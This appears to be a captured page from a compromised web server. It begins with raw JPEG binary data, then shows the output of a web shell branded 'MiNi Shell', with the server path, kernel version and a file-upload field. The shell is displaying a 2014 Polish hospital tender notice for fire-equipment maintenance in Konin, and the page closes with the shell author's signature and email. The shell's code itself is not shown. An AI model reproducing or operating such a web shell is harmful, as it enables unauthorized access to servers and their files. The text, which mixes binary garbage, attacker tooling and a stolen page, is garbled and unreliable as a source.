JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/77288-N-2014.html

<p class="kh_header"><b>Konin: Konserwacja i naprawa urządzeń przeciwpożarowych znajdujących się w obiektach Wojewódzkiego Szpitala Zespolonego w Koninie</b><br>
<b>Numer ogłoszenia: 77288 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Szpitalna 45, 62-504 Konin, woj. wielkopolskie, tel. 063 2404133, faks 063 2404134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i naprawa urządzeń przeciwpożarowych znajdujących się w obiektach Wojewódzkiego Szpitala Zespolonego w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług polegających na wykonywaniu okresowych przeglądów i wynikających z nich prac konserwacyjnych instalacji i urządzeń przeciwpożarowych,  w które wyposażone są obiekty Szpitala oraz usuwanie awarii na wezwanie Zamawiającego w ramach całodobowego serwisu. 2. Usługami, o których mowa w pkt 1 objęte będą systemy w asortymencie i ilościach wskazanych w  specyfikacji istotnych warunków zamówienia dostępnej na stronie internetowej zamawiającego. 3. Do obowiązków Wykonawcy w zakresie konserwacji instalacji sygnalizacji pożaru należy w szczególności : - sprawdzenie daty i czasu na centrali pożarowej, - przegląd i ogólne sprawdzenie stanu instalacji, - sprawdzenie działania centrali, jej stanu technicznego, - sprawdzenie zdatności centrali do uaktywniania wszystkich funkcji pomocniczych np. sterowanie klapami dymowymi, wentylatorami, drzwiami ewakuacyjnymi, itp., - sprawdzenie i regulacja przycisków i sygnalizatorów, - sprawdzenie działania linii - pętli dozorowych i sygnałowych, - prowadzenie przeglądu i konserwacji linii - pętli dozorowych i sygnałowych wraz z usunięciem zauważonych uszkodzeń, czujek pożarowych, przycisków pożarowych ROP, - sprawdzenie poprawności działania czujek pożarowej zgodnie z zaleceniami producenta oraz za pomocą imitatora dymu i temperatury itp. wraz z ich czyszczeniem, - kontrola izotopowych czujek dymu zgodnie z przepisami wydanymi na podstawie Prawa atomowego, - sprawdzenie stanu technicznego oraz mocowania przewodów linii - pętli dozorowych 
i sygnałowych wraz z usunięciem zauważonych uszkodzeń, - sprawdzenie stanu akumulatorów, - wymiana części o ograniczonej żywotności (np. lampek, bezpieczników, szybek ochronnych itp.), - przeprowadzenie na żądanie Zamawiającego, grupowych szkoleń personelu obsługującego i osób dozoru. 4. Do obowiązków Wykonawcy w zakresie konserwacji dźwiękowego systemu ostrzegawczego należy: a) przegląd i ogólne sprawdzenie stanu instalacji, b) usunięcie zabrudzeń i odkurzenie centrali DSO (szafy RACK wraz ze wzmacniaczami), c) sprawdzenie stanu akumulatorów - pomiar pojemności i napięcia każdego akumulatora oddzielnie, d) sprawdzenie współpracy systemów DSO i SAP (sygnalizacja uszkodzeń systemu DSO w centrali SAP, praca systemu DSO w trybie automatycznym - wyzwalanym przez centralę SAP, wyzwalanie komunikatu DSO z systemu SAP - pobudzenie ROP), e) sprawdzenie raportów z centrali, f) sprawdzenie poprawności działania nagranych komunikatów (w trybie automatycznym, z pulpitu mikrofonowego i za pomocą mikrofonu strażaka) do stref nagłośnienia, g) dokonać pomiaru natężenia dźwięku oraz współczynnika zrozumiałości mowy - pomiar udokumentować protokołem. 5. Do obowiązków Wykonawcy w zakresie konserwacji systemów oddymiania należy: a) optyczna kontrola urządzeń systemu, b) alarmowe otwieranie klap dymowych, c) ręczne otwarcie klap do przewietrzenia, d) sprawdzenie naciągów w klapach odcinających ręcznych, e) sprawdzenie mocowań i ewentualne przesmarowanie okuć, f) regulacja klap, g) sprawdzenie zadziałania wentylatorów oddymiających, h) sprawdzenie stanu akumulatorów, i) pomiary elektryczne (klapy zasilane 230 V).
6. Do obowiązków Wykonawcy w zakresie konserwacji drzwi przeciwpożarowych należy: a) oględziny zewnętrzne - czy nie ma uszkodzeń mechanicznych, b) sprawdzenie i regulacja położenia oraz pracy skrzydeł drzwiowych, prawidłowość przylegania skrzydeł do ościeżnicy, c) kontrola funkcyjna okuć drzwiowych: - regulacja samozamykacza, - ustawienie regulatora kolejności zamykania skrzydeł drzwi, - zamka, - rygli, - klamek i innych części mechanicznych, d) konserwacja właściwymi środkami elementów ruchomych wymagających przesmarowania (zawiasy, zamek, zapadki), e) kontrola stanu uszczelek w tym pęczniejących, f) sprawdzenie stanu technicznego i zamocowania trzymaczy elektromagnetycznych, przycisków, g) zabezpieczenie ewentualnych ognisk korozji farbą podkładową z zaleceniem technologii renowacji powłoki lakierniczej, h) sprawdzenie poprawności mocowania listew szklarskich i wkrętów mocujących listwy, i) opiniowanie konieczności napraw lub wymiany wyrobu. 7. Do obowiązków Wykonawcy w zakresie konserwacji hydrantów należy : a) sprawdzenie czy hydrant nie jest zastawiony, b) sprawdzenie czy nie ma widocznych uszkodzeń, c) sprawdzenie czy elementy nie są skorodowane, zabezpieczenie ewentualnych ognisk korozji farbą podkładową z zaleceniem technologii renowacji powłoki lakierniczej d) sprawdzenie czy miejsce umieszczenia jest wyraźnie oznakowane, e) sprawdzenie czy mocowanie do ścian jest prawidłowe, w przypadku stwierdzenia nieprawidłowości mocowania usterkę usunąć, f) sprawdzenie ciśnienia roboczego oraz równomierności wypływu wody (wskazane jest użycie miernika przepływu i ciśnienia), g) sprawdzenie węży parcianych czy na całej długości nie wykazują oznak uszkodzenia, zniekształceń, zużycia ani pęknięć. Jeżeli wąż wykazuje jakieś uszkodzenia, należy w protokole badania wskazać do wymianu na nowy, h) sprawdzenie prawidłowości zacisku lub taśmowania węża, i) sprawdzenie zwijadła wężowego oraz jego lekkości obracania się w obu kierunkach, j) sprawdzenie czy zawór odcinający działa prawidłowo, k) sprawdzenie czy prądownica jest właściwego typu i czy łatwo się nią posługiwać, l) poddanie węży co 5 lat próbie ciśnieniowej na maksymalne ciśnienie robocze. Po dokonaniu powyższych przeglądów hydrant powinien być oznakowany aktualną Kontrolką sprzętu ppoż. W przypadku konieczności naprawy na hydrancie należy umieścić napis NIECZYNNY. 8. Do obowiązków Wykonawcy w zakresie konserwacji gaśnic należy : a) sprawdzić ogólny stan techniczny gaśnicy, b) sprawdzić ciężar lub objętość środka gaśniczego, c) sprawdzić terminy przypadających kontroli zbiorników ciśnieniowych, d) sprawdzić stan węży i zabezpieczeń, e) sprawdzić parametry fizyczne i chemiczne środka gaśniczego, f) sprawdzić elementy z tworzywa sztucznego, czy nie są uszkodzone, g) sprawdzić drożność wylotu i prądownicy, h) sprawdzić powłokę malarską, i) sprawdzić czytelność, kompletność i prawidłowość napisów, j) sprawdzić uchwyt gaśnicy - czy nie jest uszkodzony i dobrze przytwierdzony k) wymienić wszystkie uszkodzone elementy na dobre autoryzowane przez producenta, l) usterki stwierdzone podczas przeglądu i konserwacji należy usunąć,  9. Wykonawca zobowiązany będzie również do wykonywania napraw instalacji i urządzeń objętych niniejszą specyfikacją. Naprawy wynikające ze stwierdzonych usterek wykonywane będą na podstawie odrębnego zlecenia i rozliczane w oparciu o kosztorys sporządzony na stawkach roboczych i narzutach nie wyższych niż: - stawka roboczogodziny (Rbg) - 20,00 zł/godz. - koszty pośrednie (Kp) + koszty zaopatrzenia (Kz) - 65%,  - zysk (Z) - 12%, -materiały - wg producenta, podatek VAT - wg cen producenta
W przypadku konieczności wykonania naprawy instalacji sygnalizacji pożaru lub innego urządzenia przeciwpożarowego termin, sposób i koszt należy uzgodnić z zamawiającym. Na prace wynikające z konieczności usunięcia usterek i awarii zamawiający przeznacza kwotę  18 000,00 zł (na okres 1 roku)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przedmiocie oraz zakresie jak wyżej.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie zastosowano</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 100 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom postawionym przez Zamawiającego Wykonawca ma obowiązek złożyć:
a) aktualne autoryzacje producentów na konserwację instalacji sygnalizacji pożaru i urządzeń przeciwpożarowych zastosowanych w obiektach Wojewódzkiego Szpitala Zespolonego w Koninie, b) aktualne zezwolenie Państwowej Agencji Atomistyki na instalację, konserwację i obsługę izotopowych czujek dymu lub udokumentowanie, że jest zawarta umowa z podwykonawcą, który ma stosowne zezwolenia, c) oświadczenie potwierdzone przez Komendę Miejską Państwowej Straży Pożarnej w Koninie, że w przypadku wygrania postępowania Wykonawca otrzyma zezwolenie na prowadzenie monitoringu pożarowego na terenie podległym KMPSP w Koninie zgodnie z art. 5 ustawy z dnia 24.08.1991 r. o ochronie przeciwpożarowej (Dz. U. z 2002 r. Nr 147, poz. 1229 z póź. zm.).</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Obniżenie cen jednostkowych może nastąpić w każdym czasie i nie wymaga zgody zamawiającego ani sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, pokój 3/14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2014 godzina 10:00, miejsce: Kancelaria Wojewódzkiego Szpitala Zespolonego w Koninie, ul. Szpitalna 45, 62-504 Konin, pokój nr 3/13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com